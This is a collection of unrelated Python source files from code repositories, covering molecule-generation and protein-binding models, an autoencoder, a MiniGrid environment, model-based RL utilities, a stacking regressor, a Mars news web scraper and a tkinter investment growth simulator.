if self.use_cuda:
result = result.cuda()
hidden = self.Encoder.init_hidden(batch_size)
if self.has_stack:
stack = self.Stack.init_stack(batch_size)
for c in range(seq_len):
inp_token = self.Embedding(inp_seq[:, c].view(batch_size, -1))
if self.has_stack:
stack = self.Stack(hidden, stack)
stack_top = stack[:, 0, :].unsqueeze(1)
inp_token = torch.cat((inp_token, stack_top), dim=2)
output, hidden = self.Encoder(inp_token, hidden)
result[:, c, :] = self.MLP(output)
return result.view(-1, n_classes)
def infer(self, prime_str, n_to_generate, max_len, tokens, temperature=0.8):
self.eval()
tokens = np.array(tokens).reshape(-1)
prime_str = [prime_str] * n_to_generate
tokens = list(tokens[0])
num_tokens = len(tokens)
prime_input = seq2tensor(prime_str, tokens)
tokens = np.array(tokens)
batch_size = prime_input.shape[0]
seq_len = prime_input.shape[1] - 1
hidden = self.Encoder.init_hidden(batch_size)
prime_input = torch.tensor(prime_input).long()
if self.use_cuda:
prime_input = prime_input.cuda()
if self.has_stack:
stack = self.Stack.init_stack(batch_size)
for c in range(seq_len):
inp_token = self.Embedding(prime_input[:, c].view(batch_size, -1))
if self.has_stack:
stack = self.Stack(hidden, stack)
stack_top = stack[:, 0, :].unsqueeze(1)
inp_token = torch.cat((inp_token, stack_top), dim=2)
output, hidden = self.Encoder(inp_token, hidden)
inp = prime_input[:, -1]
predicted = [' '] * (batch_size * (max_len - seq_len))
predicted = np.reshape(predicted, (batch_size, max_len - seq_len))
for c in range(max_len - seq_len):
inp_token = self.Embedding(inp.view(batch_size, -1))
if self.has_stack:
stack = self.Stack(hidden, stack)
stack_top = stack[:, 0, :].unsqueeze(1)
inp_token = torch.cat((inp_token, stack_top), dim=2)
output, hidden = self.Encoder(inp_token, hidden)
output = self.MLP(output)
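            # Temperature sampling: scale the network outputs by 1/temperature, exponentiate them, and draw the next token from the resulting distribution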
output_dist = output.data.view(-1).div(temperature).exp()
output_dist = output_dist.view(batch_size, num_tokens)
top_i = torch.multinomial(output_dist, 1)
# Add predicted character to string and use as next input
predicted_char = tokens[top_i]
predicted[:, c] = predicted_char[:, 0]
inp = torch.tensor(top_i)
return predicted
def cast_inputs(self, sample):
sample_seq = sample['tokenized_smiles']
lengths = sample['length']
max_len = lengths.max(dim=0)[0].cpu().numpy()
batch_size = len(lengths)
sample_seq = cut_padding(sample_seq, lengths, padding='right')
target = sample_seq[:, 1:].contiguous().view(
(batch_size * (max_len - 1), 1))
seq = sample_seq[:, :-1]
seq = torch.tensor(seq, requires_grad=True).long()
target = torch.tensor(target).long()
seq = seq.cuda()
target = target.cuda()
return seq, target.squeeze(1)
```
#### File: openchem/models/MoleculeProtein2Label.py
```python
from openchem.models.openchem_model import OpenChemModel
from openchem.optimizer.openchem_optimizer import OpenChemOptimizer
from openchem.optimizer.openchem_lr_scheduler import OpenChemLRScheduler
from openchem.data.utils import cut_padding
import torch
class MoleculeProtein2Label(OpenChemModel):
r"""
Creates a model that predicts one or multiple labels given two sequences as
input. Embeddings for each input are extracted separately with Embedding
layer, followed by encoder (could be RNN or CNN encoder) and then merged
together. Last layer of the model is multi-layer perceptron.
Args:
params (dict): dictionary describing model architecture.
"""
def __init__(self, params):
super(MoleculeProtein2Label, self).__init__(params)
self.mol_embedding = self.params['mol_embedding']
self.mol_embed_params = self.params['mol_embedding_params']
self.prot_embedding = self.params['prot_embedding']
self.prot_embed_params = self.params['prot_embedding_params']
self.MolEmbedding = self.mol_embedding(self.mol_embed_params)
self.ProtEmbedding = self.prot_embedding(self.prot_embed_params)
self.mol_encoder = self.params['mol_encoder']
self.mol_encoder_params = self.params['mol_encoder_params']
self.prot_encoder = self.params['prot_encoder']
self.prot_encoder_params = self.params['prot_encoder_params']
self.MolEncoder = self.mol_encoder(self.mol_encoder_params,
self.use_cuda)
self.ProtEncoder = self.prot_encoder(self.prot_encoder_params,
self.use_cuda)
self.merge = self.params['merge']
self.mlp = self.params['mlp']
self.mlp_params = self.params['mlp_params']
self.MLP = self.mlp(self.mlp_params)
def forward(self, inp, eval=False):
if eval:
self.eval()
else:
self.train()
mol = inp[0]
prot = inp[1]
mol_embedded = self.MolEmbedding(mol)
mol_output, _ = self.MolEncoder(mol_embedded)
prot_embedded = self.ProtEmbedding(prot)
prot_output, _ = self.ProtEncoder(prot_embedded)
if self.merge == 'mul':
output = mol_output*prot_output
elif self.merge == 'concat':
output = torch.cat((mol_output, prot_output), 1)
else:
raise ValueError('Invalid value for merge')
output = self.MLP(output)
return output
def cast_inputs(self, sample):
batch_mols = cut_padding(sample['tokenized_smiles'], sample['mol_length'],
padding='left')
batch_prots = cut_padding(sample['tokenized_protein'], sample['prot_length'],
padding='left')
batch_mols = torch.tensor(batch_mols, requires_grad=True).long()
batch_prots = torch.tensor(batch_prots, requires_grad=True).long()
batch_labels = torch.tensor(sample['labels'])
if self.task == 'classification':
batch_labels = batch_labels.long()
elif self.task == 'regression':
batch_labels = batch_labels.float()
if self.use_cuda:
batch_mols = batch_mols.cuda()
batch_prots = batch_prots.cuda()
batch_labels = batch_labels.cuda()
return (batch_mols, batch_prots), batch_labels
``` |
{
"source": "joshholla/neuro_noodle",
"score": 3
} |
#### File: joshholla/neuro_noodle/model.py
```python
import torch
from torch import nn
from torch.nn import functional as F
use_cuda = torch.cuda.is_available()
# ----------------------------------------------------------------------------------
# BUILDING OUR NEURAL NETWORK
# ----------------------------------------------------------------------------------
class Autoencoder(torch.nn.Module):
# The AutoEncoder Model
# ------------------------------------------------------------------------------
def __init__(self):
super(Autoencoder,self).__init__()
self.encoder = nn.Sequential(
nn.Linear(506 * 650, 256),
nn.ReLU(inplace=True),
nn.Linear(256, 40), # check if it is 256, or something else
nn.ReLU(inplace=True)
)
self.decoder = nn.Sequential(
nn.Linear(40, 256),
nn.ReLU(inplace=True),
nn.Linear(256, 506 * 650),
nn.ReLU(inplace=True)
)
def forward(self, x):
x = self.encoder(x)
return self.decoder(x)
# For usage after training is done
# ------------------------------------------------------------------------------
def encode(self, x):
# Generate latent representation of the input image
x = self.encoder(x)
return x
def decode(self, x):
# Generate image from the decoder.
x = self.decoder(x)
return x
def get_model():
# Returns the model and optimizer
model = Autoencoder()
optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
return model, optimizer
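# Minimal usage sketch (assumes 506x650 images flattened to vectors; the MSE loss is illustrative):
#   model, optimizer = get_model()
#   recon = model(batch.view(batch.size(0), -1))
#   loss = torch.nn.functional.mse_loss(recon, batch.view(batch.size(0), -1))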
``` |
{
"source": "joshholla/neuroRL",
"score": 3
} |
#### File: neuroRL/envs/empty.py
```python
from gym_minigrid.minigrid import *
from gym_minigrid.register import register
class EmptyEnv(MiniGridEnv):
"""
Empty grid environment, no obstacles, sparse reward
"""
def __init__(
self,
size=8,
agent_start_pos=(1,1),
agent_start_dir=0,
):
self.agent_start_pos = agent_start_pos
self.agent_start_dir = agent_start_dir
super().__init__(
grid_size=size,
max_steps=4*size*size,
# Set this to True for maximum speed
see_through_walls=True
)
def _gen_grid(self, width, height):
# Create an empty grid
self.grid = Grid(width, height)
# Generate the surrounding walls
self.grid.wall_rect(0, 0, width, height)
# Place a goal square in the bottom-right corner
self.put_obj(Goal(), width - 2, height - 2)
# Place the agent
if self.agent_start_pos is not None:
self.agent_pos = self.agent_start_pos
self.agent_dir = self.agent_start_dir
else:
self.place_agent()
# trying to align the initial directions.
self.agent_dir = self.agent_start_dir
self.mission = "get to the green goal square"
class EmptyRandomEnv10x10(EmptyEnv):
def __init__(self):
super().__init__(size=10, agent_start_pos=None)
class EmptyEnv10x10(EmptyEnv):
def __init__(self):
super().__init__(size=10)
register(
id='MiniGrid-Empty-Random-10x10-v0',
entry_point='neuroRL.envs:EmptyRandomEnv10x10'
)
register(
id='MiniGrid-Empty-10x10-v0',
entry_point='neuroRL.envs:EmptyEnv10x10'
)
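# Hedged usage sketch (not part of the original file): the classes can be
# constructed directly, or via gym.make() with the ids registered above once
# the neuroRL package is importable.
if __name__ == '__main__':
    env = EmptyEnv10x10()
    obs = env.reset()
    obs, reward, done, info = env.step(env.action_space.sample())
    print(reward, done)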
``` |
{
"source": "joshholla/prob_mbrl",
"score": 3
} |
#### File: prob_mbrl/models/activations.py
```python
import torch
class Swish(torch.nn.Module):
def forward(self, x):
return x*x.sigmoid()
class Sin(torch.nn.Module):
def forward(self, x):
return x.sin()
class SinLU(torch.nn.Module):
def __init__(self):
super(SinLU, self).__init__()
self.thr = torch.nn.Threshold(0, 0)
def forward(self, x):
return self.thr(x) - self.thr(-x).sin()
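# Hedged usage sketch (not part of the original file): the activations are
# ordinary torch modules and can be applied directly or inside nn.Sequential.
if __name__ == '__main__':
    x = torch.linspace(-3, 3, 7)
    print(Swish()(x))   # x * sigmoid(x)
    print(Sin()(x))     # sin(x)
    print(SinLU()(x))   # relu(x) - sin(relu(-x))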
```
#### File: prob_mbrl/utils/core.py
```python
import numpy as np
import torch
import os
import warnings
from collections.abc import Iterable
from itertools import chain
from matplotlib import pyplot as plt
from .rollout import rollout
def plot_sample(data, axarr, colors=None, **kwargs):
H, D = data.shape
plots = []
if colors is None:
colors = ['steelblue'] * D
N = len(colors)
for d in range(D):
pl, = axarr[d].plot(np.arange(H),
data[:, d],
color=colors[d % N],
**kwargs)
plots.append(pl)
return plots
def plot_mean_var(data, axarr, colors=None, stdevs=2, **kwargs):
N, H, D = data.shape
plots = []
mean = data.mean(0)
std = data.std(0)
t = np.arange(H)
if colors is None:
colors = ['steelblue'] * D
N = len(colors)
for d in range(D):
pl, = axarr[d].plot(t, mean[:, d], color=colors[d % N], **kwargs)
alpha = kwargs.get('alpha', 0.5)
for i in range(1, stdevs + 1):
alpha = alpha * 0.8
lower_bound = mean[:, d] - i * std[:, d]
upper_bound = mean[:, d] + i * std[:, d]
axarr[d].fill_between(t,
lower_bound,
upper_bound,
alpha=alpha,
color=pl.get_color())
plots.append(pl)
return plots
def plot_trajectories(
states,
actions,
rewards,
names=['Rolled out States', 'Predicted Actions', 'Predicted Rewards'],
timeout=0.5,
plot_samples=True):
for name in names:
fig = plt.figure(name)
fig.clear()
fig1, axarr1 = plt.subplots(states.shape[-1],
num=names[0],
sharex=True,
figsize=(16, 9))
fig2, axarr2 = plt.subplots(actions.shape[-1],
num=names[1],
sharex=True,
figsize=(16, 3))
fig3, axarr3 = plt.subplots(rewards.shape[-1],
num=names[2],
sharex=True,
figsize=(16, 3))
axarr1 = [axarr1] if not isinstance(axarr1, Iterable) else axarr1
axarr2 = [axarr2] if not isinstance(axarr2, Iterable) else axarr2
axarr3 = [axarr3] if not isinstance(axarr3, Iterable) else axarr3
if plot_samples:
c1 = c2 = c3 = None
for i, (st, ac, rw) in enumerate(zip(states, actions, rewards)):
r1 = plot_sample(st, axarr1, c1, alpha=0.3)
r2 = plot_sample(ac, axarr2, c2, alpha=0.3)
r3 = plot_sample(rw, axarr3, c3, alpha=0.3)
c1 = [r.get_color() for r in r1]
c2 = [r.get_color() for r in r2]
c3 = [r.get_color() for r in r3]
else:
plot_mean_var(states, axarr1)
plot_mean_var(actions, axarr2)
plot_mean_var(rewards, axarr3)
for ax in chain(axarr1, axarr2, axarr3):
ax.figure.canvas.draw()
if timeout > 0:
plt.show(block=False)
plt.waitforbuttonpress(timeout)
else:
plt.show()
def plot_rollout(x0, forward, pol, steps):
trajs = rollout(x0,
forward,
pol,
steps,
resample_model=False,
resample_policy=False,
resample_particles=False)
states, actions, rewards = (torch.stack(x).transpose(
0, 1).detach().cpu().numpy() for x in trajs[:3])
plot_trajectories(states, actions, rewards)
def jacobian(y, x, **kwargs):
"""Evaluates the jacobian of y w.r.t x safely.
Args:
y (Tensor<m>): Tensor to differentiate.
x (Tensor<n>): Tensor to differentiate with respect to.
**kwargs: Additional key-word arguments to pass to `grad()`.
Returns:
Jacobian (Tensor<m, n>).
"""
J = [torch.autograd.grad(y[i], x, **kwargs)[0] for i in range(y.shape[0])]
J = torch.stack(J)
J.requires_grad_()
return J
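# Hedged usage sketch (not in the original module): `jacobian` calls grad() once
# per output, so the graph has to be kept alive between calls, e.g.
#   x = torch.randn(3, requires_grad=True)
#   y = torch.stack([x.sum(), (x ** 2).sum()])
#   J = jacobian(y, x, retain_graph=True)   # J has shape (2, 3)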
def batch_jacobian(f, x, out_dims=None):
if out_dims is None:
y = f(x)
out_dims = y.shape[-1]
x_rep = x.repeat(out_dims, 1)
x_rep = torch.tensor(x_rep, requires_grad=True)
y_rep = f(x_rep)
dydx = torch.autograd.grad(y_rep,
x_rep,
torch.eye(x.shape[-1]),
allow_unused=True,
retain_graph=True)
return dydx
def polyak_averaging(current, target, tau=0.005):
for param, target_param in zip(current.parameters(), target.parameters()):
target_param.data.copy_(tau * param.data +
(1 - tau) * target_param.data)
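# Hedged usage sketch (not in the original module): a typical soft target-network
# update, blending 0.5% of the online weights into the target per call, e.g.
#   online, target = torch.nn.Linear(4, 2), torch.nn.Linear(4, 2)
#   polyak_averaging(online, target, tau=0.005)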
def perturb_initial_action(i, states, actions):
if i == 0:
actions = actions + 1e-1 * (torch.randint(0,
2,
actions.shape[0:],
device=actions.device,
dtype=actions.dtype) *
actions.std(0)).detach()
return states, actions
def threshold_linear(x, y0, yend, x0, xend):
y = (x - x0) * (yend - y0) / (xend - x0) + y0
return np.maximum(y0, np.minimum(yend, y)).astype(np.int32)
def sin_squashing_fn(x):
'''
Periodic squashing function from PILCO.
Bounds the output to be between -1 and 1
'''
xx = torch.stack([x, 3 * x]).sin()
scale = torch.tensor([9.0, 1.0], device=x.device,
dtype=x.dtype)[[None] * x.dim()].transpose(0, -1)
return 0.125 * (xx * scale).sum(0)
def load_checkpoint(path, dyn, pol, exp, val=None):
msg = "Unable to load dynamics model parameters at {}"
try:
dyn_params = torch.load(os.path.join(path, 'latest_dynamics.pth.tar'))
dyn.load(dyn_params)
except Exception:
warnings.warn(msg.format(path, "latest_dynamics.pth.tar"))
try:
pol_params = torch.load(os.path.join(path, 'latest_policy.pth.tar'))
pol.load(pol_params)
except Exception:
warnings.warn(msg.format(path, "latest_policy.pth.tar"))
if val is not None:
try:
val_path = os.path.join(path, 'latest_critic.pth.tar')
val_params = torch.load(val_path)
val.load(val_params)
except Exception:
warnings.warn(msg.format(val_path))
try:
exp_path = os.path.join(path, 'experience.pth.tar')
exp.load(exp_path)
except Exception:
warnings.warn(msg.format(exp_path))
``` |
{
"source": "joshhopkins3/web-scraping-challenge",
"score": 3
} |
#### File: web-scraping-challenge/Missions_to_Mars/scrape_mars.py
```python
from splinter import Browser, browser
from bs4 import BeautifulSoup as bs
import pandas as pd
def init_browser():
executable_path = {'executable_path': "/Users/joshhopkins/.wdm/drivers/chromedriver/mac64/91.0.4472.101/chromedriver"}
browser = Browser("chrome", **executable_path, headless=False)
def scrape():
browser = init_browser()
# --- Visit Mars News site ---
browser.visit('https://mars.nasa.gov/news/')
# Scrape page into Soup
html = browser.html
soup = bs(html, "html.parser")
# Get the first news title
titles = soup.find_all('div', class_='content_title')
news_title = titles[0].text
# Get the corresponding paragraph text
paragraphs = soup.find_all('div', class_='article_teaser_body')
news_paragraph = paragraphs[0].text
# --- Visit JPL site for featured Mars image ---
browser.visit('https://data-class-jpl-space.s3.amazonaws.com/JPL_Space/index.html')
# Scrape page into Soup
html = browser.html
soup = bs(html, 'html.parser')
# Search for image source
img = soup.find_all('img', class_='headerimage fade-in')
source = soup.find('img', class_='headerimage fade-in').get('src')
url = 'https://data-class-jpl-space.s3.amazonaws.com/JPL_Space/'
feat_url = url + source
# --- Use Pandas to scrape data ---
tables = pd.read_html('https://space-facts.com/mars/')
# Take second table for Mars facts
mars_df = tables[1]
# Convert table to html
mars_facts = [mars_df.to_html(classes='data table table-borderless', index=False, header=False, border=0)]
# --- Visit USGS Astrogeology Site ---
browser.visit('https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars')
# Search for Hemisphere titles
html = browser.html
soup = bs(html, 'html.parser')
hemispheres = []
# Search for the names of all four hemispheres
results = soup.find_all('div', class_="collapsible results")
hemi_names = results[0].find_all('h3')
# Get text and store in list
for name in hemi_names:
hemispheres.append(name.text)
# Search for thumbnail links
thumbnail_results = results[0].find_all('a')
thumbnail_links = []
for thumbnail in thumbnail_results:
# If the thumbnail element has an image...
if (thumbnail.img):
# then grab the attached link
thumbnail_url = 'https://astrogeology.usgs.gov/' + thumbnail['href']
# Append list with links
thumbnail_links.append(thumbnail_url)
# --- Extract Image URLs ---
full_imgs = []
for url in thumbnail_links:
# Click through each thumbnail link
browser.visit(url)
html = browser.html
soup = bs(html, 'html.parser')
# Scrape each page for the relative image path
results = soup.find_all('img', class_='wide-image')
relative_img_path = results[0]['src']
# Combine the relative image path to get the full URL
img_link = 'https://astrogeology.usgs.gov/' + relative_img_path
# Add full image links to a list
full_imgs.append(img_link)
# --- Zip together the list of hemisphere names and hemisphere image links ---
mars_zip = zip(hemispheres, full_imgs)
hemisphere_image_urls = []
# Iterate through the zipped object
for title, img in mars_zip:
mars_hemi_dict = {}
# Add hemisphere title to dictionary
mars_hemi_dict['title'] = title
# Add image url to dictionary
mars_hemi_dict['img_url'] = img
# Append the list with dictionaries
hemisphere_image_urls.append(mars_hemi_dict)
# --- Store data in a dictionary ---
mars_data = {
"news_title": news_title,
"news_paragraph": news_paragraph,
"featured_image": feat_url,
"mars_facts": mars_facts,
"hemispheres": hemisphere_image_urls
}
# Close the browser after scraping
browser.quit()
# Return results
return mars_data
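# Hedged usage sketch (not part of the original script): scrape() is meant to be
# imported and called elsewhere; run standalone it needs a local chromedriver at
# the hard-coded executable_path above.
#   if __name__ == '__main__':
#       print(scrape())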
``` |
{
"source": "josh-howes/sklearn-stacking",
"score": 3
} |
#### File: sklearn-stacking/ensemble/stacking_regressor.py
```python
import numpy as np
from sklearn.base import BaseEstimator, RegressorMixin, TransformerMixin, clone
from sklearn.externals import six
from sklearn.utils.validation import check_is_fitted
from sklearn.linear_model import Lasso
from sklearn.cross_validation import train_test_split
from sklearn.externals.joblib import Parallel, delayed
def _parallel_fit(estimator, X, y):
fitted_estimator = clone(estimator).fit(X, y)
return fitted_estimator
class StackingRegressor(BaseEstimator, RegressorMixin, TransformerMixin):
"""Stacked Generalization (Stacking) Model.
Parameters
----------
estimators : list of regressors
Invoking the ``fit`` method on the ``StackingRegressor`` will fit clones
of those original estimators that will be stored in the class attribute
`self.estimators_`.
combiner : regressor or None, optional (default=None)
The base regressor to fit on a train/test split of the estimators' predictions.
If None, then the base estimator is a linear regressor model.
cross_val_test_size : float, optional (default=0.33)
random_state : int or None, optional (default=None)
Attributes
----------
estimators_ : list of regressors
The collection of fitted sub-estimators.
combiner_ : regressor
Fitted combining regressor.
"""
def __init__(self, estimators, combiner=None, cross_val_test_size=0.33, random_state=None):
self.estimators = estimators
self.combiner = combiner
self.cross_val_test_size = cross_val_test_size
self.random_state = random_state
def fit(self, X, y):
""" Fit the estimators.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape = [n_samples]
Target values.
Returns
-------
self : object
"""
if self.estimators is None or len(self.estimators) == 0:
raise AttributeError('Invalid `estimators` attribute, `estimators`'
' should be a list of estimators.')
if self.combiner is None:
# Normalizing and constraining coefficients to positive numbers helps with multicollinearity
self.combiner = Lasso(alpha=1e-9, positive=True, fit_intercept=False, normalize=True)
if not isinstance(self.combiner, RegressorMixin):
raise AttributeError('Invalid `combiner` attribute, `combiner`'
' should be an instance of a regressor.')
X_train, X_test, y_train, y_test = train_test_split(X,
y,
test_size=self.cross_val_test_size,
random_state=self.random_state)
n_estimators = len(self.estimators)
self.estimators_ = Parallel(n_jobs=n_estimators)(
delayed(_parallel_fit)(
estimator,
X_train,
y_train
)
for estimator in self.estimators)
X_stack = np.asarray([estimator.predict(X_test) for estimator in self.estimators_]).T
self.combiner_ = self.combiner.fit(X_stack, y_test)
return self
def predict(self, X):
""" Predict class labels for X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
Returns
----------
predictions : array-like, shape = [n_samples]
Regressed values
"""
check_is_fitted(self, 'estimators_')
check_is_fitted(self, 'combiner_')
X_stack = np.asarray([estimator.predict(X) for estimator in self.estimators_]).T
return self.combiner_.predict(X_stack)
def transform(self, X):
"""Return class labels or probabilities for X for each estimator.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
Returns
-------
array-like, shape = [n_samples]
Predicted values from the fitted combiner.
"""
check_is_fitted(self, 'estimators_')
check_is_fitted(self, 'combiner_')
return self.predict(X)
def get_params(self, deep=False):
"""Return estimator parameter names for GridSearch support"""
if not deep:
return super(StackingRegressor, self).get_params(deep=False)
else:
# TODO: this will not work, need to implement `named_estimators`
raise NotImplementedError("`deep` attribute not yet supported.")
out = super(StackingRegressor, self).get_params(deep=False)
out.update(self.named_estimators.copy())
for name, step in six.iteritems(self.named_estimators):
for key, value in six.iteritems(step.get_params(deep=True)):
out['%s__%s' % (name, key)] = value
return out
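# Hedged usage sketch (not part of the original module, and assuming the older
# scikit-learn release this file targets, where sklearn.cross_validation still
# exists): stack two base regressors and let the default Lasso combiner weight
# their held-out predictions.
if __name__ == '__main__':
    from sklearn.datasets import make_regression
    from sklearn.linear_model import Ridge
    from sklearn.tree import DecisionTreeRegressor
    X, y = make_regression(n_samples=200, n_features=10, random_state=0)
    stack = StackingRegressor(
        estimators=[Ridge(alpha=1.0), DecisionTreeRegressor(max_depth=4)],
        random_state=0)
    stack.fit(X, y)
    print(stack.predict(X[:5]))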
``` |
{
"source": "JoshHumpherey/Financial_Calculators",
"score": 4
} |
#### File: JoshHumpherey/Financial_Calculators/investment_growth.py
```python
import tkinter as tk
import random
import matplotlib
import time
from functools import wraps
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
matplotlib.use('TkAgg')
FIELDS = ('Annual Contribution','Annual Increase (In $)','Current Age', 'Retirement Age', 'Current Portfolio Value',
'Percent in Stocks (vs. Bonds)', 'Inflation')
AGE_SPREAD = [15]
STOCK_ALLOCATION = []
CURRENT_YEAR = 2018
STRATEGIES = {'Fixed Allocations', 'Shifting Bond Allocations'}
OFFSET = 1872
STOCK_MAP = dict()
BOND_MAP = dict()
with open('stock_history.txt') as stock_file:
STOCK_DATA = stock_file.readlines()
for year in range(OFFSET, CURRENT_YEAR-1):
STOCK_MAP[year] = STOCK_DATA[year-OFFSET]
with open('bond_history.txt') as bond_file:
BOND_DATA = bond_file.readlines()
for year in range(OFFSET, CURRENT_YEAR-1):
BOND_MAP[year] = BOND_DATA[year-OFFSET]
class Results:
""" The Results class holds the data from a signle simulation instance. """
def __init__(self, simulation_number, final_balance, growth_history):
self.simulation_number = simulation_number
self.final_balance = final_balance
self.growth_history = growth_history
class Investor:
""" The Investor class holds information that the user enters about themselves. """
def __init__(self, entries):
self.contribution = (float(entries['Annual Contribution'].get()))
self.current_age = (int(entries['Current Age'].get()))
self.retirement_age = (int(entries['Retirement Age'].get()))
self.starting_value = (float(entries['Current Portfolio Value'].get()))
self.stock_percentage = float(entries['Percent in Stocks (vs. Bonds)'].get())/100
self.contribution_increase = float(entries['Annual Increase (In $)'].get())
self.inflation = float(entries['Inflation'].get())/100
self.investment_timeline = int(self.retirement_age-self.current_age)
def get_final_balance(obj):
""" Takes in the data from a year and returns it's final balance. """
return obj.final_balance
def calculate_portfolio(entries, results_array):
"""
This is currently the main method for the program.
It uses nested loops to simulate an investor's lifetime (inner loop)
a certain number of times (outer loop)
and then outputs and graphs the results.
"""
investor_values = Investor(entries)
STOCK_ALLOCATION.append(investor_values.stock_percentage)
portfolio_spread = [investor_values.starting_value]
balance = float(portfolio_spread[0])
matrix_length = investor_values.retirement_age - investor_values.current_age
matrix_height = 10000
data_matrix = create_matrix(matrix_length, matrix_height)
base_contribution = investor_values.contribution
for sim_count in range(10000):
iteration_age = investor_values.current_age
iteration_balance = balance
length_offset = investor_values.current_age
investor_values.contribution = base_contribution
for i in range(iteration_age, investor_values.retirement_age+1):
current_year_tuple = get_yearly_information(investor_values)
iteration_balance = update_balance(iteration_balance,
investor_values.contribution, current_year_tuple)
investor_values.contribution += investor_values.contribution_increase
data_matrix[sim_count][i-length_offset-1] = iteration_balance
result_object = Results(sim_count, data_matrix[sim_count][iteration_age-length_offset-1],
data_matrix[sim_count][:])
results_array.append(result_object)
quartile_tuple = get_quartile_data(10000)
plot_trendlines(quartile_tuple, results_array)
display_capital(investor_values.investment_timeline, investor_values.contribution, investor_values.starting_value)
def update_balance(iteration_balance, contribution, current_year_tuple):
""" Takes in a single year's data during a single simulation and updates the balance. """
STOCK_RATE = 0
BOND_RATE = 1
STOCK_PCT = 2
iteration_balance = iteration_balance + contribution
stock_balance = iteration_balance * current_year_tuple[STOCK_PCT]
bond_balance = iteration_balance * (1-current_year_tuple[STOCK_PCT])
stock_balance += (stock_balance * current_year_tuple[STOCK_RATE])
bond_balance += (bond_balance * current_year_tuple[BOND_RATE])
#print("Portfolio started at " + str(iteration_balance) + " and after a year of " + str(current_year_tuple[STOCK_RATE]) + " change it is now at: " + str(stock_balance + bond_balance))
iteration_balance = stock_balance + bond_balance
return iteration_balance
def get_quartile_data(number_of_simulations):
""" Take in the number of simulations and output the quartile line numbers. """
std_increment = round(number_of_simulations/100)
lower_quartile = round(std_increment*25)
middle_quartile = round(std_increment*50)
upper_quartile = round((std_increment*75))
quartile_tuple = (lower_quartile, middle_quartile, upper_quartile)
return quartile_tuple
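# Hedged illustration (not in the original file): with 10,000 simulations the
# increment is 100, so get_quartile_data(10000) returns (2500, 5000, 7500).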
def plot_trendlines(quartile_tuple, results_array):
""" Take in the line numbers to plot and output a plot of those lines. """
plt.clf()
LOWER = 0
MID = 1
UPPER = 2
sorted_results = sorted(results_array, key=get_final_balance)
plt.xlabel('Years of Growth')
plt.ylabel('Portfolio Value')
plt.title('Investment Growth Calculator')
smooth_lower = smooth_trendlines(quartile_tuple[LOWER], 100, sorted_results)
smooth_middle = smooth_trendlines(quartile_tuple[MID], 100, sorted_results)
smooth_upper = smooth_trendlines(quartile_tuple[UPPER], 100, sorted_results)
plt.plot(smooth_lower)
plt.plot(smooth_middle)
plt.plot(smooth_upper)
lower_result = round(smooth_lower[-1])
middle_result = round(smooth_middle[-1])
upper_result = round(smooth_upper[-1])
lower_string = str(format(lower_result, ",d"))
middle_string = str(format(middle_result, ",d"))
upper_string = str(format(upper_result, ",d"))
results_string = (" Bottom Quartile: $" + lower_string + " * Middle Quartile: $"
+ middle_string + " * Upper Quartile: $" + upper_string + " ")
PERFORMANCE_VAR.set(results_string)
def display_capital(investment_length, added_yearly, initial_capital):
total_capital = round(initial_capital + (investment_length*added_yearly))
formatted_capital = str(format(total_capital, ",d"))
results_string = ("Total Invesment Capital: $" + formatted_capital)
CAPITAL_VAR.set(results_string)
def smooth_trendlines(n_quartile, smooth_amount, sorted_results):
""" This averages the results of a quartile against it's neighbours. """
half = (smooth_amount) // 2
my_line = sorted_results[n_quartile].growth_history
for line in range(n_quartile-half, n_quartile+half):
other_line = sorted_results[line].growth_history
for i in range(len(my_line)):
my_line[i] += other_line[i]
for i in range(len(my_line)):
my_line[i] /= smooth_amount
return my_line
def create_matrix(length, height):
""" Creates a matrix to store data in using a certain length and height. """
matrix = [[0 for x in range(length)] for y in range(height)]
return matrix
def get_yearly_information(investor_information):
""" This function grabs stock/bond data from a random year. """
random_year = random.randint(1872, CURRENT_YEAR-2)
inflation = investor_information.inflation
stock_rate = float(STOCK_MAP[random_year])
bond_rate = float(BOND_MAP[random_year])
stock_percentage = float(STOCK_ALLOCATION[0])
year_tuple = (stock_rate-int(inflation), bond_rate-int(inflation), stock_percentage)
return year_tuple
def create_form(ROOT):
""" This creates the main form using tkinter. """
create_initial_figure()
create_performance_text()
ents = make_form(ROOT, FIELDS)
create_buttons(ents)
ROOT.wm_iconbitmap('images/money.ico')
def create_initial_figure():
""" This creates the graph on which the results are ploted. """
fig = plt.figure(1)
plt.ion()
plt.xlabel('Years of Growth')
plt.ylabel('Portfolio Value')
plt.title('Investment Growth Calculator')
canvas = FigureCanvasTkAgg(fig, master=ROOT)
plot_widget = canvas.get_tk_widget()
plot_widget.pack()
def make_form(ROOT, FIELDS):
""" This takes our FIELDS parameter and generates text boxes from them. """
entries = {}
for field in FIELDS:
row = tk.Frame(ROOT)
lab = tk.Label(row, width=22, text=field+": ", anchor='w')
ent = tk.Entry(row)
ent.insert(0, "0")
row.pack(side=tk.TOP, fill=tk.X, padx=5, pady=5)
lab.pack(side=tk.LEFT)
ent.pack(side=tk.RIGHT, expand=tk.YES, fill=tk.X)
entries[field] = ent
return entries
def create_buttons(ents):
""" This creates the buttons a user can interact with. """
button_2 = tk.Button(ROOT, text='Quit', command=ROOT.quit)
button_2.pack(side=tk.BOTTOM, padx=5, pady=5)
button_1 = tk.Button(ROOT, text='Calculate', command=(lambda e=ents: calculate_portfolio(e, [])))
button_1.pack(side=tk.BOTTOM, padx=5, pady=5)
def create_performance_text():
""" This creates the text describing how each of the quartiles ended up. """
global PERFORMANCE_VAR
global CAPITAL_VAR
PERFORMANCE_VAR = tk.StringVar()
PERFORMANCE_VAR.set("")
performance_label = tk.Label(textvariable=PERFORMANCE_VAR, font=(None, 15))
performance_label.pack(side=tk.TOP)
CAPITAL_VAR = tk.StringVar()
CAPITAL_VAR.set("")
capital_label = tk.Label(textvariable=CAPITAL_VAR, font=(None, 15))
capital_label.pack(side=tk.TOP)
if __name__ == '__main__':
ROOT = tk.Tk()
ROOT.wm_title("Portfolio Growth Estimator")
create_form(ROOT)
ROOT.mainloop()
```
